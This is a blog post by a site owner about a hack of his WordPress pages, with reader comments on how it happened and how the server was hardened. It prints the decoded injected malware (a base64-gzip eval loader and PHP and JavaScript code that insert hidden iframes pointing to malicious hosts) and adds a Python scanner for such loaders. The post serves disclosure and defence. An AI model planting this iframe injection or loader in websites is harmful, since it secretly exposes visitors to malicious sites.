The sorry state this page is in…

… is mostly due to the fact that it has been partially hacked. Unprotected visitors might have been tracked or redirected to malicious sites.

I hope I have removed all hidden content and apologize for the inconvenience.

Every index.php was prefixed with the following code:

<?php eval(gzinflate(base64_decode('…'))); ?>

This itself decodes into:

if (!isset($ftl))
{
  global $ftl;
  $ftl=1;                 // guard so the iframe is injected only once per request
  error_reporting(0);     // suppress any PHP errors the injection might cause
  print('<iframe '
        . 'style="visibility: hidden; position: absolute; left: 0; top: 0;" '
        . 'src="nohttp://click.clickspro.org/feed/frames.php?uid=56&'
        . 'frames=3" width="10" height="10">');
}

And the second infection decodes into:

if (document.getElementsByTagName('body')[0])
{
  iframer();   // body already parsed: inject via the DOM
} else {
  // body not available yet: write the hidden iframe inline
  document.write('<iframe style="visibility: hidden; position: absolute; left: 0; top: 0;" '
    + 'src="nohttp://ghefeed.org/feed/frames.php?uid=56&amp;frames=3" '
    + 'width="10" height="10"></iframe>');
}
function iframer()
{
  var f = document.createElement('iframe');
  f.setAttribute('src','nohttp://ghefeed.org/feed/frames.php?uid=56&frames=3');
  f.style.visibility='hidden';
  f.style.position='absolute';
  f.style.left='0';
  f.style.top='0';
  f.setAttribute('width','10');
  f.setAttribute('height','10');
  document.getElementsByTagName('body')[0].appendChild(f);
}

Fortunately, the attack ended here and did not manage to do any more damage. Keeping Debian and WordPress up to date appears to have shielded against anything serious.
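As an added defender-side example (not the post's own code), the following Python reconstructs the single obfuscation layer described above: it finds the eval(gzinflate(base64_decode('…'))) loader in a PHP file, unpacks it the way PHP's gzinflate() would (raw DEFLATE), and flags the hidden-iframe traits that appear in the decoded code. The sample infected index.php and the feed-host.invalid URL are constructed here and are not taken from the post.

```python
import base64
import re
import zlib

# Signature of the loader the post found prefixed to every index.php:
# eval(gzinflate(base64_decode('<blob>'))). Only the blob varies.
LOADER_RE = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)\s*\)",
    re.IGNORECASE,
)
# Traits of the decoded payload worth flagging, taken from the post's decoded code.
IOC_RE = re.compile(
    r"<iframe|visibility:\s*hidden|error_reporting\(0\)|/feed/frames\.php", re.IGNORECASE
)

def gzinflate(data: bytes) -> bytes:
    """Equivalent of PHP gzinflate(): raw DEFLATE, no zlib or gzip header (wbits=-15)."""
    return zlib.decompress(data, -15)

def decode_loaders(php_source: str) -> list[dict]:
    """Locate every obfuscated loader in a PHP file and unpack one layer of it."""
    findings = []
    for m in LOADER_RE.finditer(php_source):
        try:
            payload = gzinflate(base64.b64decode(m.group(1))).decode("utf-8", "replace")
        except (zlib.error, ValueError) as exc:
            payload = f"<undecodable: {exc}>"
        hits = sorted({h.lower() for h in IOC_RE.findall(payload)})
        findings.append({"offset": m.start(), "payload": payload, "indicators": hits})
    return findings

def build_sample_infected_index() -> str:
    """Constructed sample input: a minimal index.php with the loader prefixed to it.
    The inner payload mirrors the post's decoded PHP; the feed host is a placeholder."""
    inner = (
        "if(!isset($ftl)){global $ftl;$ftl=1;error_reporting(0);"
        "print('<iframe style=\"visibility: hidden; position: absolute; left: 0; top: 0;\" "
        "src=\"http://feed-host.invalid/feed/frames.php?uid=56&frames=3\" width=\"10\" height=\"10\">');}"
    )
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw DEFLATE, as PHP gzdeflate() produces
    blob = base64.b64encode(comp.compress(inner.encode()) + comp.flush()).decode()
    loader = f"<?php eval(gzinflate(base64_decode('{blob}')));?>"
    return loader + "<?php\nrequire('./wp-blog-header.php');\n"

if __name__ == "__main__":
    for f in decode_loaders(build_sample_infected_index()):
        print(f"loader at byte {f['offset']}, indicators: {f['indicators']}")
        print(f["payload"])
```

Run against real files with a loop over `find . -name '*.php'`; a clean file yields an empty list, and any non-empty result should be compared against the site's known-good copy before deletion.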

Lessons learned: clickspro.org is a junkpit, ghefeed.org too.

About

A coder that is slightly older than 'the giant leap for all mankind'.

2 comments on “The sorry state this page is in…”
  1. J. says:

    I got hacked by this too (“only” 30 WordPress installations) but I am still concerned about one thing: how did it write itself to all index.php files on several sites which did not have WordPress? Is it resident within PHP?

    In my case, the eval’ed code was written. So somewhere else in your system there must be an exploit which did this.

    Did you figure out what caused it?

  2. herd says:

    You probably made the same (beginner's) mistake as me:
    taking PHP security for granted.

    After I was hacked, I found out that all my content was writable by user www-data, which is how the infection took place. An old theme and turning Akismet off for a while opened the inherent security holes. Then the code wrote itself to all PHP files, but neither the server security nor anything else than the PHP files themselves got compromised. After all, I wasn’t the target, my visitors were.

    After some googling about hardened PHP, I found some interesting suggestions that I put into good measure, like exactly limiting which URLs can have their PHP files executed and closing cross-site scripting gaps and so on. Now I can even have eval and gzinflate enabled (WordPress won’t work without it) and still be safe until the next exploit happens.

1 Pingback/Trackback for “The sorry state this page is in…”
  1. […] too much information on the subject; digging a little, one finds references to this threat (here and here). There is speculation about a possible backdoor that would facilitate reinjection […]
